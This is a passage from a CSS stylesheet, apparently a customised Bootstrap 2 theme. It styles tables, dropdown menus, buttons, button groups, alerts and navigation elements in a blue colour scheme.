.table-bordered tbody:first-child tr:first-child > td:first-child,
.table-bordered tbody:first-child tr:first-child > th:first-child {
	-webkit-border-top-left-radius: 4px;
	-moz-border-radius-topleft: 4px;
	border-top-left-radius: 4px;
}
.table-bordered thead:first-child tr:first-child > th:last-child,
.table-bordered tbody:first-child tr:first-child > td:last-child,
.table-bordered tbody:first-child tr:first-child > th:last-child {
	-webkit-border-top-right-radius: 4px;
	-moz-border-radius-topright: 4px;
	border-top-right-radius: 4px;
}
.table-bordered thead:last-child tr:last-child > th:first-child,
.table-bordered tbody:last-child tr:last-child > td:first-child,
.table-bordered tbody:last-child tr:last-child > th:first-child,
.table-bordered tfoot:last-child tr:last-child > td:first-child,
.table-bordered tfoot:last-child tr:last-child > th:first-child {
	-webkit-border-bottom-left-radius: 4px;
	-moz-border-radius-bottomleft: 4px;
	border-bottom-left-radius: 4px;
}
.table-bordered thead:last-child tr:last-child > th:last-child,
.table-bordered tbody:last-child tr:last-child > td:last-child,
.table-bordered tbody:last-child tr:last-child > th:last-child,
.table-bordered tfoot:last-child tr:last-child > td:last-child,
.table-bordered tfoot:last-child tr:last-child > th:last-child {
	-webkit-border-bottom-right-radius: 4px;
	-moz-border-radius-bottomright: 4px;
	border-bottom-right-radius: 4px;
}
.table-bordered tfoot + tbody:last-child tr:last-child td:first-child {
	-webkit-border-bottom-left-radius: 0;
	-moz-border-radius-bottomleft: 0;
	border-bottom-left-radius: 0;
}
.table-bordered tfoot + tbody:last-child tr:last-child td:last-child {
	-webkit-border-bottom-right-radius: 0;
	-moz-border-radius-bottomright: 0;
	border-bottom-right-radius: 0;
}
.table-bordered caption + thead tr:first-child th:first-child,
.table-bordered caption + tbody tr:first-child td:first-child,
.table-bordered colgroup + thead tr:first-child th:first-child,
.table-bordered colgroup + tbody tr:first-child td:first-child {
	-webkit-border-top-left-radius: 4px;
	-moz-border-radius-topleft: 4px;
	border-top-left-radius: 4px;
}
.table-bordered caption + thead tr:first-child th:last-child,
.table-bordered caption + tbody tr:first-child td:last-child,
.table-bordered colgroup + thead tr:first-child th:last-child,
.table-bordered colgroup + tbody tr:first-child td:last-child {
	-webkit-border-top-right-radius: 4px;
	-moz-border-radius-topright: 4px;
	border-top-right-radius: 4px;
}
.table-striped tbody > tr:nth-child(odd) > td,
.table-striped tbody > tr:nth-child(odd) > th {
	background-color: #f9f9f9;
}
.table-hover tbody tr:hover > td,
.table-hover tbody tr:hover > th {
	background-color: #f5f5f5;
}
table td[class*="span"],
table th[class*="span"],
.row-fluid table td[class*="span"],
.row-fluid table th[class*="span"] {
	display: table-cell;
	float: none;
	margin-left: 0;
}
.table td.span1,
.table th.span1 {
	float: none;
	width: 44px;
	margin-left: 0;
}
.table td.span2,
.table th.span2 {
	float: none;
	width: 124px;
	margin-left: 0;
}
.table td.span3,
.table th.span3 {
	float: none;
	width: 204px;
	margin-left: 0;
}
.table td.span4,
.table th.span4 {
	float: none;
	width: 284px;
	margin-left: 0;
}
.table td.span5,
.table th.span5 {
	float: none;
	width: 364px;
	margin-left: 0;
}
.table td.span6,
.table th.span6 {
	float: none;
	width: 444px;
	margin-left: 0;
}
.table td.span7,
.table th.span7 {
	float: none;
	width: 524px;
	margin-left: 0;
}
.table td.span8,
.table th.span8 {
	float: none;
	width: 604px;
	margin-left: 0;
}
.table td.span9,
.table th.span9 {
	float: none;
	width: 684px;
	margin-left: 0;
}
.table td.span10,
.table th.span10 {
	float: none;
	width: 764px;
	margin-left: 0;
}
.table td.span11,
.table th.span11 {
	float: none;
	width: 844px;
	margin-left: 0;
}
.table td.span12,
.table th.span12 {
	float: none;
	width: 924px;
	margin-left: 0;
}
.table tbody tr.success > td {
	background-color: #dff0d8;
}
.table tbody tr.error > td {
	background-color: #f2dede;
}
.table tbody tr.warning > td {
	background-color: #fcf8e3;
}
.table tbody tr.info > td {
	background-color: #d9edf7;
}
.table-hover tbody tr.success:hover > td {
	background-color: #d0e9c6;
}
.table-hover tbody tr.error:hover > td {
	background-color: #ebcccc;
}
.table-hover tbody tr.warning:hover > td {
	background-color: #faf2cc;
}
.table-hover tbody tr.info:hover > td {
	background-color: #c4e3f3;
}
.table-noheader {
	border-collapse: collapse;
}
.table-noheader thead {
	display: none;
}
.dropup,
.dropdown {
	position: relative;
}
.dropdown-toggle {
	*margin-bottom: -3px;
}
.dropdown-toggle:active,
.open .dropdown-toggle {
	outline: 0;
}
.caret {
	display: inline-block;
	width: 0;
	height: 0;
	vertical-align: top;
	border-top: 4px solid #000;
	border-right: 4px solid transparent;
	border-left: 4px solid transparent;
	content: "";
}
.dropdown .caret {
	margin-top: 8px;
	margin-left: 2px;
}
.dropdown-menu {
	position: absolute;
	top: 100%;
	left: 0;
	z-index: 1000;
	display: none;
	float: left;
	min-width: 160px;
	padding: 5px 0;
	margin: 2px 0 0;
	list-style: none;
	background-color: #fff;
	border: 1px solid #ccc;
	border: 1px solid rgba(0,0,0,0.2);
	*border-right-width: 2px;
	*border-bottom-width: 2px;
	-webkit-border-radius: 6px;
	-moz-border-radius: 6px;
	border-radius: 6px;
	-webkit-box-shadow: 0 5px 10px rgba(0,0,0,0.2);
	-moz-box-shadow: 0 5px 10px rgba(0,0,0,0.2);
	box-shadow: 0 5px 10px rgba(0,0,0,0.2);
	-webkit-background-clip: padding-box;
	-moz-background-clip: padding;
	background-clip: padding-box;
}
.dropdown-menu.pull-right {
	right: 0;
	left: auto;
}
.dropdown-menu .divider {
	*width: 100%;
	height: 1px;
	margin: 8px 1px;
	*margin: -5px 0 5px;
	overflow: hidden;
	background-color: #e5e5e5;
	border-bottom: 1px solid #fff;
}
.dropdown-menu .menuitem-group {
	margin: 4px 1px;
	overflow: hidden;
	border-top: 1px solid #eee;
	border-bottom: 1px solid #eee;
	background-color: #eee;
	color: #555;
	text-transform: capitalize;
	font-size: 95%;
	padding: 3px 20px;
}
.dropdown-menu > li > a {
	display: block;
	padding: 3px 20px;
	clear: both;
	font-weight: normal;
	line-height: 18px;
	color: #333;
	white-space: nowrap;
}
.dropdown-menu > li > a:hover,
.dropdown-menu > li > a:focus,
.dropdown-submenu:hover > a,
.dropdown-submenu:focus > a {
	text-decoration: none;
	color: #fff;
	background-color: #005783;
	background-image: -moz-linear-gradient(top,#005e8d,#004d74);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#005e8d),to(#004d74));
	background-image: -webkit-linear-gradient(top,#005e8d,#004d74);
	background-image: -o-linear-gradient(top,#005e8d,#004d74);
	background-image: linear-gradient(to bottom,#005e8d,#004d74);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff005e8d', endColorstr='#ff004c73', GradientType=0);
}
.dropdown-menu > .active > a,
.dropdown-menu > .active > a:hover,
.dropdown-menu > .active > a:focus {
	color: #333;
	text-decoration: none;
	outline: 0;
	background-color: #005783;
	background-image: -moz-linear-gradient(top,#005e8d,#004d74);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#005e8d),to(#004d74));
	background-image: -webkit-linear-gradient(top,#005e8d,#004d74);
	background-image: -o-linear-gradient(top,#005e8d,#004d74);
	background-image: linear-gradient(to bottom,#005e8d,#004d74);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff005e8d', endColorstr='#ff004c73', GradientType=0);
}
.dropdown-menu > .disabled > a,
.dropdown-menu > .disabled > a:hover,
.dropdown-menu > .disabled > a:focus {
	color: #999;
}
.dropdown-menu > .disabled > a:hover,
.dropdown-menu > .disabled > a:focus {
	text-decoration: none;
	background-color: transparent;
	background-image: none;
	filter: progid:DXImageTransform.Microsoft.gradient(enabled = false);
	cursor: default;
}
.open {
	*z-index: 1000;
}
.open > .dropdown-menu {
	display: block;
}
.dropdown-backdrop {
	position: fixed;
	left: 0;
	right: 0;
	bottom: 0;
	top: 0;
	z-index: 990;
}
.pull-right > .dropdown-menu {
	right: 0;
	left: auto;
}
.dropup .caret,
.navbar-fixed-bottom .dropdown .caret {
	border-top: 0;
	border-bottom: 4px solid #000;
	content: "";
}
.dropup .dropdown-menu,
.navbar-fixed-bottom .dropdown .dropdown-menu {
	top: auto;
	bottom: 100%;
	margin-bottom: 1px;
}
.dropdown-submenu {
	position: relative;
}
.dropdown-submenu > .dropdown-menu {
	top: 0;
	left: 100%;
	margin-top: -6px;
	margin-left: -1px;
	-webkit-border-radius: 6px 6px 6px 6px;
	-moz-border-radius: 6px 6px 6px 6px;
	border-radius: 6px 6px 6px 6px;
}
.dropdown-submenu:hover > .dropdown-menu {
	display: block;
}
.dropup .dropdown-submenu > .dropdown-menu {
	top: auto;
	bottom: 0;
	margin-top: 0;
	margin-bottom: -2px;
	-webkit-border-radius: 5px 5px 5px 0;
	-moz-border-radius: 5px 5px 5px 0;
	border-radius: 5px 5px 5px 0;
}
.dropdown-submenu > a:after {
	display: block;
	content: " ";
	float: right;
	width: 0;
	height: 0;
	border-color: transparent;
	border-style: solid;
	border-width: 5px 0 5px 5px;
	border-left-color: #cccccc;
	margin-top: 5px;
	margin-right: -10px;
}
.dropdown-submenu:hover > a:after {
	border-left-color: #fff;
}
.dropdown-submenu.pull-left {
	float: none;
}
.dropdown-submenu.pull-left > .dropdown-menu {
	left: -100%;
	margin-left: 10px;
	-webkit-border-radius: 6px 0 6px 6px;
	-moz-border-radius: 6px 0 6px 6px;
	border-radius: 6px 0 6px 6px;
}
.dropdown .dropdown-menu .nav-header {
	padding-left: 20px;
	padding-right: 20px;
}
.typeahead {
	z-index: 1051;
	margin-top: 2px;
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
}
.well {
	min-height: 20px;
	padding: 19px;
	margin-bottom: 20px;
	background-color: #f5f5f5;
	border: 1px solid #e3e3e3;
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
	-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.05);
	-moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.05);
	box-shadow: inset 0 1px 1px rgba(0,0,0,0.05);
}
.well blockquote {
	border-color: #ddd;
	border-color: rgba(0,0,0,0.15);
}
.well-large {
	padding: 24px;
	-webkit-border-radius: 6px;
	-moz-border-radius: 6px;
	border-radius: 6px;
}
.well-small {
	padding: 9px;
	-webkit-border-radius: 3px;
	-moz-border-radius: 3px;
	border-radius: 3px;
}
.fade {
	opacity: 0;
	-webkit-transition: opacity .15s linear;
	-moz-transition: opacity .15s linear;
	-o-transition: opacity .15s linear;
	transition: opacity .15s linear;
}
.fade.in {
	opacity: 1;
}
.collapse {
	position: relative;
	height: 0;
	overflow: hidden;
	-webkit-transition: height .35s ease;
	-moz-transition: height .35s ease;
	-o-transition: height .35s ease;
	transition: height .35s ease;
}
.collapse.in {
	height: auto;
}
.close {
	float: right;
	font-size: 20px;
	font-weight: bold;
	line-height: 18px;
	color: #000;
	text-shadow: 0 1px 0 #ffffff;
	opacity: 0.2;
	filter: alpha(opacity=20);
}
.close:hover,
.close:focus {
	color: #000;
	text-decoration: none;
	cursor: pointer;
	opacity: 0.4;
	filter: alpha(opacity=40);
}
button.close {
	padding: 3;
	cursor: pointer;
	background: transparent;
	border: 0;
	-webkit-appearance: none;
}
.alert-options {
	float: right;
	line-height: 18px;
	color: #000;
	text-shadow: 0 1px 0 #ffffff;
	opacity: 0.2;
	filter: alpha(opacity=20);
}
.alert-options:hover,
.alert-options:focus {
	color: #000;
	text-decoration: none;
	cursor: pointer;
	opacity: 0.4;
	filter: alpha(opacity=40);
}
.btn {
	display: inline-block;
	*display: inline;
	*zoom: 1;
	padding: 4px 12px;
	margin-bottom: 0;
	font-size: 13px;
	line-height: 18px;
	text-align: center;
	vertical-align: middle;
	cursor: pointer;
	color: #333;
	text-shadow: 0 1px 1px rgba(255,255,255,0.75);
	background-color: #f5f5f5;
	background-image: -moz-linear-gradient(top,#fff,#e6e6e6);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#fff),to(#e6e6e6));
	background-image: -webkit-linear-gradient(top,#fff,#e6e6e6);
	background-image: -o-linear-gradient(top,#fff,#e6e6e6);
	background-image: linear-gradient(to bottom,#fff,#e6e6e6);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffffff', endColorstr='#ffe5e5e5', GradientType=0);
	border-color: #e6e6e6 #e6e6e6 #bfbfbf;
	*background-color: #e6e6e6;
	filter: progid:DXImageTransform.Microsoft.gradient(enabled = false);
	border: 1px solid #bbb;
	*border: 0;
	border-bottom-color: #a2a2a2;
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
	*margin-left: .3em;
	-webkit-box-shadow: inset 0 1px 0 rgba(255,255,255,.2), 0 1px 2px rgba(0,0,0,.05);
	-moz-box-shadow: inset 0 1px 0 rgba(255,255,255,.2), 0 1px 2px rgba(0,0,0,.05);
	box-shadow: inset 0 1px 0 rgba(255,255,255,.2), 0 1px 2px rgba(0,0,0,.05);
}
.btn:hover,
.btn:focus,
.btn:active,
.btn.active,
.btn.disabled,
.btn[disabled] {
	color: #333;
	background-color: #e6e6e6;
	*background-color: #d9d9d9;
}
.btn:active,
.btn.active {
	background-color: #cccccc \9;
}
.btn:first-child {
	*margin-left: 0;
}
.btn:hover,
.btn:focus {
	color: #333;
	text-decoration: none;
	background-position: 0 -15px;
	-webkit-transition: background-position .1s linear;
	-moz-transition: background-position .1s linear;
	-o-transition: background-position .1s linear;
	transition: background-position .1s linear;
}
.btn:focus {
	outline: thin dotted #333;
	outline: 5px auto -webkit-focus-ring-color;
	outline-offset: -2px;
}
.btn.active,
.btn:active {
	background-image: none;
	outline: 0;
	-webkit-box-shadow: inset 0 2px 4px rgba(0,0,0,.15), 0 1px 2px rgba(0,0,0,.05);
	-moz-box-shadow: inset 0 2px 4px rgba(0,0,0,.15), 0 1px 2px rgba(0,0,0,.05);
	box-shadow: inset 0 2px 4px rgba(0,0,0,.15), 0 1px 2px rgba(0,0,0,.05);
}
.btn.disabled,
.btn[disabled] {
	cursor: default;
	background-image: none;
	opacity: 0.65;
	filter: alpha(opacity=65);
	-webkit-box-shadow: none;
	-moz-box-shadow: none;
	box-shadow: none;
}
.btn-large {
	padding: 11px 19px;
	font-size: 16.25px;
	-webkit-border-radius: 6px;
	-moz-border-radius: 6px;
	border-radius: 6px;
}
.btn-large [class^="icon-"],
.btn-large [class*=" icon-"] {
	margin-top: 4px;
}
.btn-small {
	padding: 2px 10px;
	font-size: 12px;
	-webkit-border-radius: 3px;
	-moz-border-radius: 3px;
	border-radius: 3px;
}
.btn-small [class^="icon-"],
.btn-small [class*=" icon-"] {
	margin-top: 0;
}
.btn-mini [class^="icon-"],
.btn-mini [class*=" icon-"] {
	margin-top: -1px;
}
.btn-mini {
	padding: 0 6px;
	font-size: 9.75px;
	-webkit-border-radius: 3px;
	-moz-border-radius: 3px;
	border-radius: 3px;
}
.btn-block {
	display: block;
	width: 100%;
	padding-left: 0;
	padding-right: 0;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	box-sizing: border-box;
}
.btn-block + .btn-block {
	margin-top: 5px;
}
input[type="submit"].btn-block,
input[type="reset"].btn-block,
input[type="button"].btn-block {
	width: 100%;
}
.btn-primary.active,
.btn-warning.active,
.btn-danger.active,
.btn-success.active,
.btn-info.active,
.btn-inverse.active {
	color: rgba(255,255,255,0.75);
}
.btn-primary {
	color: #fff;
	text-shadow: 0 -1px 0 rgba(0,0,0,0.25);
	background-color: #004b8d;
	background-image: -moz-linear-gradient(top,#005e8d,#002f8d);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#005e8d),to(#002f8d));
	background-image: -webkit-linear-gradient(top,#005e8d,#002f8d);
	background-image: -o-linear-gradient(top,#005e8d,#002f8d);
	background-image: linear-gradient(to bottom,#005e8d,#002f8d);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff005e8d', endColorstr='#ff002e8d', GradientType=0);
	border-color: #002f8d #002f8d #001641;
	*background-color: #002f8d;
	filter: progid:DXImageTransform.Microsoft.gradient(enabled = false);
}
.btn-primary:hover,
.btn-primary:focus,
.btn-primary:active,
.btn-primary.active,
.btn-primary.disabled,
.btn-primary[disabled] {
	color: #fff;
	background-color: #002f8d;
	*background-color: #002674;
}
.btn-primary:active,
.btn-primary.active {
	background-color: #001e5a \9;
}
.btn-warning {
	color: #fff;
	text-shadow: 0 -1px 0 rgba(0,0,0,0.25);
	background-color: #faa732;
	background-image: -moz-linear-gradient(top,#fbb450,#f89406);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#fbb450),to(#f89406));
	background-image: -webkit-linear-gradient(top,#fbb450,#f89406);
	background-image: -o-linear-gradient(top,#fbb450,#f89406);
	background-image: linear-gradient(to bottom,#fbb450,#f89406);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#fffab44f', endColorstr='#fff89406', GradientType=0);
	border-color: #f89406 #f89406 #ad6704;
	*background-color: #f89406;
	filter: progid:DXImageTransform.Microsoft.gradient(enabled = false);
}
.btn-warning:hover,
.btn-warning:focus,
.btn-warning:active,
.btn-warning.active,
.btn-warning.disabled,
.btn-warning[disabled] {
	color: #fff;
	background-color: #f89406;
	*background-color: #df8505;
}
.btn-warning:active,
.btn-warning.active {
	background-color: #c67605 \9;
}
.btn-danger {
	color: #fff;
	text-shadow: 0 -1px 0 rgba(0,0,0,0.25);
	background-color: #da4f49;
	background-image: -moz-linear-gradient(top,#ee5f5b,#bd362f);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#ee5f5b),to(#bd362f));
	background-image: -webkit-linear-gradient(top,#ee5f5b,#bd362f);
	background-image: -o-linear-gradient(top,#ee5f5b,#bd362f);
	background-image: linear-gradient(to bottom,#ee5f5b,#bd362f);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffee5f5b', endColorstr='#ffbd362f', GradientType=0);
	border-color: #bd362f #bd362f #802420;
	*background-color: #bd362f;
	filter: progid:DXImageTransform.Microsoft.gradient(enabled = false);
}
.btn-danger:hover,
.btn-danger:focus,
.btn-danger:active,
.btn-danger.active,
.btn-danger.disabled,
.btn-danger[disabled] {
	color: #fff;
	background-color: #bd362f;
	*background-color: #a9302a;
}
.btn-danger:active,
.btn-danger.active {
	background-color: #942a25 \9;
}
.btn-success {
	color: #fff;
	text-shadow: 0 -1px 0 rgba(0,0,0,0.25);
	background-color: #5bb75b;
	background-image: -moz-linear-gradient(top,#62c462,#51a351);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#62c462),to(#51a351));
	background-image: -webkit-linear-gradient(top,#62c462,#51a351);
	background-image: -o-linear-gradient(top,#62c462,#51a351);
	background-image: linear-gradient(to bottom,#62c462,#51a351);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff62c462', endColorstr='#ff51a351', GradientType=0);
	border-color: #51a351 #51a351 #387038;
	*background-color: #51a351;
	filter: progid:DXImageTransform.Microsoft.gradient(enabled = false);
}
.btn-success:hover,
.btn-success:focus,
.btn-success:active,
.btn-success.active,
.btn-success.disabled,
.btn-success[disabled] {
	color: #fff;
	background-color: #51a351;
	*background-color: #499249;
}
.btn-success:active,
.btn-success.active {
	background-color: #408140 \9;
}
.btn-info {
	color: #fff;
	text-shadow: 0 -1px 0 rgba(0,0,0,0.25);
	background-color: #49afcd;
	background-image: -moz-linear-gradient(top,#5bc0de,#2f96b4);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#5bc0de),to(#2f96b4));
	background-image: -webkit-linear-gradient(top,#5bc0de,#2f96b4);
	background-image: -o-linear-gradient(top,#5bc0de,#2f96b4);
	background-image: linear-gradient(to bottom,#5bc0de,#2f96b4);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff5bc0de', endColorstr='#ff2f96b4', GradientType=0);
	border-color: #2f96b4 #2f96b4 #1f6377;
	*background-color: #2f96b4;
	filter: progid:DXImageTransform.Microsoft.gradient(enabled = false);
}
.btn-info:hover,
.btn-info:focus,
.btn-info:active,
.btn-info.active,
.btn-info.disabled,
.btn-info[disabled] {
	color: #fff;
	background-color: #2f96b4;
	*background-color: #2a85a0;
}
.btn-info:active,
.btn-info.active {
	background-color: #24748c \9;
}
.btn-inverse {
	color: #fff;
	text-shadow: 0 -1px 0 rgba(0,0,0,0.25);
	background-color: #363636;
	background-image: -moz-linear-gradient(top,#444,#222);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#444),to(#222));
	background-image: -webkit-linear-gradient(top,#444,#222);
	background-image: -o-linear-gradient(top,#444,#222);
	background-image: linear-gradient(to bottom,#444,#222);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff444444', endColorstr='#ff222222', GradientType=0);
	border-color: #222 #222 #000000;
	*background-color: #222;
	filter: progid:DXImageTransform.Microsoft.gradient(enabled = false);
}
.btn-inverse:hover,
.btn-inverse:focus,
.btn-inverse:active,
.btn-inverse.active,
.btn-inverse.disabled,
.btn-inverse[disabled] {
	color: #fff;
	background-color: #222;
	*background-color: #151515;
}
.btn-inverse:active,
.btn-inverse.active {
	background-color: #090909 \9;
}
button.btn,
input[type="submit"].btn {
	*padding-top: 3px;
	*padding-bottom: 3px;
}
button.btn::-moz-focus-inner,
input[type="submit"].btn::-moz-focus-inner {
	padding: 0;
	border: 0;
}
button.btn.btn-large,
input[type="submit"].btn.btn-large {
	*padding-top: 7px;
	*padding-bottom: 7px;
}
button.btn.btn-small,
input[type="submit"].btn.btn-small {
	*padding-top: 3px;
	*padding-bottom: 3px;
}
button.btn.btn-mini,
input[type="submit"].btn.btn-mini {
	*padding-top: 1px;
	*padding-bottom: 1px;
}
.btn-link,
.btn-link:active,
.btn-link[disabled] {
	background-color: transparent;
	background-image: none;
	-webkit-box-shadow: none;
	-moz-box-shadow: none;
	box-shadow: none;
}
.btn-link {
	border-color: transparent;
	cursor: pointer;
	color: #005e8d;
	-webkit-border-radius: 0;
	-moz-border-radius: 0;
	border-radius: 0;
}
.btn-link:hover,
.btn-link:focus {
	color: #002b41;
	text-decoration: underline;
	background-color: transparent;
}
.btn-link[disabled]:hover,
.btn-link[disabled]:focus {
	color: #333;
	text-decoration: none;
}
.btn-group {
	position: relative;
	display: inline-block;
	*display: inline;
	*zoom: 1;
	font-size: 0;
	vertical-align: middle;
	white-space: nowrap;
	*margin-left: .3em;
}
.btn-group:first-child {
	*margin-left: 0;
}
.btn-group + .btn-group {
	margin-left: 5px;
}
.btn-toolbar {
	font-size: 0;
	margin-top: 9px;
	margin-bottom: 9px;
}
.btn-toolbar > .btn + .btn,
.btn-toolbar > .btn-group + .btn,
.btn-toolbar > .btn + .btn-group {
	margin-left: 5px;
}
.btn-group > .btn {
	position: relative;
	-webkit-border-radius: 0;
	-moz-border-radius: 0;
	border-radius: 0;
}
.btn-group > .btn + .btn {
	margin-left: -1px;
}
.btn-group > .btn,
.btn-group > .dropdown-menu,
.btn-group > .popover {
	font-size: 13px;
}
.btn-group > .btn-mini {
	font-size: 9.75px;
}
.btn-group > .btn-small {
	font-size: 12px;
}
.btn-group > .btn-large {
	font-size: 16.25px;
}
.btn-group > .btn:first-child {
	margin-left: 0;
	-webkit-border-top-left-radius: 4px;
	-moz-border-radius-topleft: 4px;
	border-top-left-radius: 4px;
	-webkit-border-bottom-left-radius: 4px;
	-moz-border-radius-bottomleft: 4px;
	border-bottom-left-radius: 4px;
}
.btn-group > .btn:last-child,
.btn-group > .dropdown-toggle {
	-webkit-border-top-right-radius: 4px;
	-moz-border-radius-topright: 4px;
	border-top-right-radius: 4px;
	-webkit-border-bottom-right-radius: 4px;
	-moz-border-radius-bottomright: 4px;
	border-bottom-right-radius: 4px;
}
.btn-group > .btn.large:first-child {
	margin-left: 0;
	-webkit-border-top-left-radius: 6px;
	-moz-border-radius-topleft: 6px;
	border-top-left-radius: 6px;
	-webkit-border-bottom-left-radius: 6px;
	-moz-border-radius-bottomleft: 6px;
	border-bottom-left-radius: 6px;
}
.btn-group > .btn.large:last-child,
.btn-group > .large.dropdown-toggle {
	-webkit-border-top-right-radius: 6px;
	-moz-border-radius-topright: 6px;
	border-top-right-radius: 6px;
	-webkit-border-bottom-right-radius: 6px;
	-moz-border-radius-bottomright: 6px;
	border-bottom-right-radius: 6px;
}
.btn-group > .btn:hover,
.btn-group > .btn:focus,
.btn-group > .btn:active,
.btn-group > .btn.active {
	z-index: 2;
}
.btn-group .dropdown-toggle:active,
.btn-group.open .dropdown-toggle {
	outline: 0;
}
.btn-group > .btn + .dropdown-toggle {
	padding-left: 8px;
	padding-right: 8px;
	-webkit-box-shadow: inset 1px 0 0 rgba(255,255,255,.125), inset 0 1px 0 rgba(255,255,255,.2), 0 1px 2px rgba(0,0,0,.05);
	-moz-box-shadow: inset 1px 0 0 rgba(255,255,255,.125), inset 0 1px 0 rgba(255,255,255,.2), 0 1px 2px rgba(0,0,0,.05);
	box-shadow: inset 1px 0 0 rgba(255,255,255,.125), inset 0 1px 0 rgba(255,255,255,.2), 0 1px 2px rgba(0,0,0,.05);
	*padding-top: 5px;
	*padding-bottom: 5px;
}
.btn-group > .btn-mini + .dropdown-toggle {
	padding-left: 5px;
	padding-right: 5px;
	*padding-top: 2px;
	*padding-bottom: 2px;
}
.btn-group > .btn-small + .dropdown-toggle {
	*padding-top: 5px;
	*padding-bottom: 4px;
}
.btn-group > .btn-large + .dropdown-toggle {
	padding-left: 12px;
	padding-right: 12px;
	*padding-top: 7px;
	*padding-bottom: 7px;
}
.btn-group.open .dropdown-toggle {
	background-image: none;
	-webkit-box-shadow: inset 0 2px 4px rgba(0,0,0,.15), 0 1px 2px rgba(0,0,0,.05);
	-moz-box-shadow: inset 0 2px 4px rgba(0,0,0,.15), 0 1px 2px rgba(0,0,0,.05);
	box-shadow: inset 0 2px 4px rgba(0,0,0,.15), 0 1px 2px rgba(0,0,0,.05);
}
.btn-group.open .btn.dropdown-toggle {
	background-color: #e6e6e6;
}
.btn-group.open .btn-primary.dropdown-toggle {
	background-color: #002f8d;
}
.btn-group.open .btn-warning.dropdown-toggle {
	background-color: #f89406;
}
.btn-group.open .btn-danger.dropdown-toggle {
	background-color: #bd362f;
}
.btn-group.open .btn-success.dropdown-toggle {
	background-color: #51a351;
}
.btn-group.open .btn-info.dropdown-toggle {
	background-color: #2f96b4;
}
.btn-group.open .btn-inverse.dropdown-toggle {
	background-color: #222;
}
.btn .caret {
	margin-top: 8px;
	margin-left: 0;
}
.btn-large .caret {
	margin-top: 6px;
}
.btn-large .caret {
	border-left-width: 5px;
	border-right-width: 5px;
	border-top-width: 5px;
}
.btn-mini .caret,
.btn-small .caret {
	margin-top: 8px;
}
.dropup .btn-large .caret {
	border-bottom-width: 5px;
}
.btn-primary .caret,
.btn-warning .caret,
.btn-danger .caret,
.btn-info .caret,
.btn-success .caret,
.btn-inverse .caret {
	border-top-color: #fff;
	border-bottom-color: #fff;
}
.btn-group-vertical {
	display: inline-block;
	*display: inline;
	*zoom: 1;
}
.btn-group-vertical > .btn {
	display: block;
	float: none;
	max-width: 100%;
	-webkit-border-radius: 0;
	-moz-border-radius: 0;
	border-radius: 0;
}
.btn-group-vertical > .btn + .btn {
	margin-left: 0;
	margin-top: -1px;
}
.btn-group-vertical > .btn:first-child {
	-webkit-border-radius: 4px 4px 0 0;
	-moz-border-radius: 4px 4px 0 0;
	border-radius: 4px 4px 0 0;
}
.btn-group-vertical > .btn:last-child {
	-webkit-border-radius: 0 0 4px 4px;
	-moz-border-radius: 0 0 4px 4px;
	border-radius: 0 0 4px 4px;
}
.btn-group-vertical > .btn-large:first-child {
	-webkit-border-radius: 6px 6px 0 0;
	-moz-border-radius: 6px 6px 0 0;
	border-radius: 6px 6px 0 0;
}
.btn-group-vertical > .btn-large:last-child {
	-webkit-border-radius: 0 0 6px 6px;
	-moz-border-radius: 0 0 6px 6px;
	border-radius: 0 0 6px 6px;
}
.alert {
	padding: 8px 35px 8px 14px;
	margin-bottom: 18px;
	text-shadow: 0 1px 0 rgba(255,255,255,0.5);
	background-color: #fcf8e3;
	border: 1px solid #fbeed5;
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
}
.alert,
.alert h4 {
	color: #c09853;
}
.alert h4 {
	margin: 0 0 .5em;
}
.alert .close {
	position: relative;
	top: -2px;
	right: -21px;
	line-height: 18px;
	cursor: pointer;
}
.alert-success {
	background-color: #dff0d8;
	border-color: #d6e9c6;
	color: #468847;
}
.alert-success h4 {
	color: #468847;
}
.alert-danger,
.alert-error {
	background-color: #f2dede;
	border-color: #eed3d7;
	color: #b94a48;
}
.alert-danger h4,
.alert-error h4 {
	color: #b94a48;
}
.alert-info {
	background-color: #d9edf7;
	border-color: #bce8f1;
	color: #3a87ad;
}
.alert-info h4 {
	color: #3a87ad;
}
.alert-block {
	padding-top: 14px;
	padding-bottom: 14px;
}
.alert-block > p,
.alert-block > ul {
	margin-bottom: 0;
}
.alert-block p + p {
	margin-top: 5px;
}
.nav {
	margin-left: 0;
	margin-bottom: 18px;
	list-style: none;
}
.nav > li > a {
	display: block;
}
.nav > li > a:hover,
.nav > li > a:focus {
	text-decoration: none;
	background-color: #eee;
}
.nav > li > a > img {
	max-width: none;
}
.nav > .pull-right {
	float: right;
}
.nav-header {
	display: block;
	padding: 3px 15px;
	font-size: 11px;
	font-weight: bold;
	line-height: 18px;
	color: #999;
	text-shadow: 0 1px 0 rgba(255,255,255,0.5);
	text-transform: uppercase;
}
.nav li + .nav-header {
	margin-top: 9px;
}
.nav-list {
	padding-left: 15px;
	padding-right: 15px;
